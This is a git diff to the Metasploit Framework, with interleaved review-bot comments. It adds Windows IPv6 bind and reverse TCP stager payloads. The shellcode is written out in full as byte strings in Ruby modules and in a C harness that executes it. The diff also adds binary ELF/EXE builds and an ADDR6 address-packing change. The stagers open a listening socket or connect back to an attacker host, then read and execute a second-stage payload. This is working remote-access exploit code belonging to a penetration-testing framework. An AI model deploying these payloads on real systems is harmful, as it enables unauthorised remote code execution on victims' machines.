diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf new file mode 100755 index 0000000000000000000000000000000000000000..57f04909f3f26a2bda7bf79ec3a4187c9c99e6c7 GIT binary patch literal 1003 zcmah|-%Aux6h5;%x+_?$V6dA)Q!FU`7XxJqq*;C{S) z_6wPabG6%~b%acGay7yeu38Hu*ObD|{Hrh&jKp}6#7MrC(3PQ=shmizrBMd)qw+jS znOR1Ai3J*hm#fQJTz%pCyqsxp%y?WI`axfO4~g?W?CoQ=F`9KYjEA11$7V2u%I1vK zZb9|udx@YIW1e{VJnXmZ4KVD!i2qFRP-VvZD=>U`%7b_-e;pqF&~{Ac<&PlC`nb8| z){7v|X3dX9#P57Ol%~qFbBe8*(em5cBXO)kYZ literal 0 HcmV?d00001 diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe new file mode 100644 index 0000000000000000000000000000000000000000..e613af04e3424b592521f953cecbe98f9bd2113c GIT binary patch literal 3072 zcmeZ`VqjorU|?VY;{X2{7wN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vABj6wc{ z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQAb)vWAUJb{or|C#^bL)S=XqDls@c^ zQek|Z*3IMH9VNr~x|^k&@x^N)O+A|5%3y8^s$NF+}%zD+K<(-g&?CaBrzd7JFo1@PCv3|Di0Aoh*HiK546m z{5Ss}YG8OE00rFiFKQ6rFu3EBRM$-)Rl}(IVHE7Etk1SAOgViPkf?R%Dh06y+zU0vi(-@t}nL z;CWug`ZHi|bkVul4@Dnv$RIb<*h cFfe2=0Ld(d|DimchqHh@pinSSfyDpI0C=}?7XSbN literal 0 HcmV?d00001 diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c new file mode 100644 index 0000000000..730ce91b4d --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c 
@@ -0,0 +1,28 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" +"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50" +"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89" +"\xe1\x6a\x10\x51\x57\xff\x55\x20\x59\x59\x6a\x40\x68\x00\x10\x00" +"\x00\x68\x00\x00\x10\x00\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68" +"\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} 
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf new file mode 100755 index 0000000000000000000000000000000000000000..ed4b42c5ae0374d551a5dab71802a407dcac32f6 GIT binary patch literal 983 zcmah{O=}ZT6upy7Yzk3Qh>(ziqXZfhLh}K()J0uX&`N2Te2@e?CT3(Bl2|emj3Bfw zhexaZ2VHa}imu$$MYM~6E?fu|-DnjtnkZOwArzkXWimR=rZ>E~@0|1I-j_RPdFJv3 zj^n@#8`y!NjTPP*!_3LyW9qZB^y(KD% z7mwEI&Ydos#(X*@>Yv*u@GAEZKJj_KZ2FeIcK_VJ`gZvD!hd$sN8%NH`*DYVA3b3BV*|6F5&gic_2MKxEp*Qt zY<6at+6WSMlf?WEh0_*no@2Rh!=CyJ!DHMpzYXDHo?^X+aarqaB8VbqhFQN4?n2~%bE4vsIob3tsDK^sE-Zc5aOp69mwN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vAB6hZ!k z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQAb)vWAUJb{or|C#^bL)S=XqDls@c^ zQek|Z*3IMH9VNr~x|^k&@x^NcN zAM5a7qj+N@hUi{ziNOEYJMVWM?kyF`VvP(8{%_L%Ka?f1lcn#`CvEkR|K|TgH4F~~ z0D%J#{ts2@Jf2Yx%s?4T3`&BX53>XU!~cgWL`G&gWPmbW1}OVwG5inZ={%eT datastore['LHOST'], + 'LocalHost' => lsnr, 'LocalPort' => datastore['LPORT'].to_i, 'Comm' => comm, 'Context' => diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index ced3a0ebfd..b87273cb53 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -267,9 +267,10 @@ class Payload < Msf::Module # # Supprted packing types: # - # - ADDR (foo.com, 1.2.3.4) - # - HEX (0x12345678, "\x41\x42\x43\x44") - # - RAW (raw bytes) + # - ADDR (foo.com, 1.2.3.4) + # - ADDR6 (foo.com, fe80::1234:5678:8910:1234) + # - HEX (0x12345678, "\x41\x42\x43\x44") + # - RAW (raw bytes) # def substitute_vars(raw, offsets) offsets.each_pair { |name, info| 
@@ -282,6 +283,19 @@ class Payload < Msf::Module if ((val = datastore[name])) if (pack == 'ADDR') val = Rex::Socket.resolv_nbo(val) + + # Someone gave us a funky address (ipv6?) + if(val.length == 4) + raise RuntimeError, "IPv6 address specified for IPv4 payload" + end + elsif (pack == 'ADDR6') + val = Rex::Socket.resolv_nbo(val) + + # Convert v4 to the v6ish address + if(val.length == 4) + nip = "fe80::5efe:" + val.unpack("C*").join(".") + val = Rex::Socket.resolv_nbo(val) + end elsif (pack == 'RAW') # Just use the raw value... else diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb new file mode 100644 index 0000000000..7847754e2b --- /dev/null +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb 
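Review bot: Both new address branches in substitute_vars (lib/msf/core/payload.rb) look wrong as written. In the `ADDR` branch the guard `if(val.length == 4)` raises "IPv6 address specified for IPv4 payload" exactly when the resolved value is four bytes long, which is the IPv4 case; assuming resolv_nbo returns a longer packed value for an IPv6 address, the test should be `if(val.length != 4)`. In the `ADDR6` branch the `fe80::5efe:` string is built into `nip`, but the next line resolves `val` again, so `nip` is never used and a 4-byte value would be substituted into a slot meant for a 16-byte address; that line should read `val = Rex::Socket.resolv_nbo(nip)`. The method begins above this hunk and continues past it, so the final length handling is not visible here.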
@@ -0,0 +1,75 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' +require 'msf/core/handler/bind_tcp' + +module Msf +module Payloads +module Stagers +module Windows + +module BindTcpIPv6 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def self.handler_type_alias + "bind_ipv6_tcp" + end + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Bind TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection over IPv6', + 'Author' => ['hdm', 'skape'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Convention' => 'sockedi', + 'Stager' => + { + 'Offsets' => + { + 'LPORT' => [ 253+1, 'n' ], + }, + 'Payload' => + "\xfc"+ + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+ + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+ + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+ + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+ + "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+ + "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ + "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+ + "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55"+ 
+ "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89"+ + "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89"+ + "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53"+ + "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1"+ + "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00"+ + "\x00\x53\x57\xff\x55\x18\xff\xd3" + } + )) + end + +end + +end end end end diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb new file mode 100644 index 0000000000..54b24a002e --- /dev/null +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb 
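Review bot: The `'Payload'` blob and the `'LPORT' => [ 253+1, 'n' ]` offset in bind_ipv6_tcp.rb carry no comment tying them to a source file, so a reviewer cannot tell from the module which assembly the bytes were built from or why the offset is written as a sum. The diffstat adds external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm, which is presumably the source. Suggest a comment above `'Payload'` such as `# Assembled from external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm; rebuild rather than editing bytes by hand`, and one on the offset such as `# +1 for the leading "\xfc"; points at the \xff\xff port placeholder after \x68\x17\x00`. Counting the visible bytes, offset 254 does land on that placeholder, so this is a documentation gap rather than a wrong value.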
@@ -0,0 +1,81 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' + +module Msf +module Payloads +module Stagers +module Windows + +module ReverseTcpIPv6 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + + def self.handler_type_alias + "reverse_ipv6_tcp" + end + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Reverse TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Connect back to the attacker over IPv6', + 'Author' => ['hdm', 'skape'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Convention' => 'sockedi', + 'Stager' => + { + 'Offsets' => + { + 'LHOST' => [ 246+1, 'ADDR6' ], + 'LPORT' => [ 240+1, 'n' ], + 'SCOPEID' => [ 262+1, 'V' ] + }, + 'Payload' => + "\xfc" + + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+ + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+ + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+ + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+ + "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+ + "\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+ + 
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+ + "\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"+ + "\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"+ + "\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"+ + "\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"+ + "\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3" + } + )) + register_options( + [ + OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) + ], self.class) + end + +end + +end end end end
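Review bot: The SCOPEID option text in reverse_ipv6_tcp.rb says the value is "required for link-layer addresses", while the commit message and the `fe80::` default embedded in the payload are about link-local addresses, and the option itself is declared optional with a default of 0. Suggest `OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-local addresses", 0])` so the help text names the right address class. The three `'Offsets'` entries are also undocumented; by byte count they line up with the port, address and scope-id fields of the 28-byte structure whose length `\x6a\x1c` pushes, and a short comment saying so would let the values be checked without recounting. The diffstat adds win32_reverse_read_ipv6 .bin/.c/.elf/.exe but no matching .asm, so the source for this blob appears not to be part of the commit.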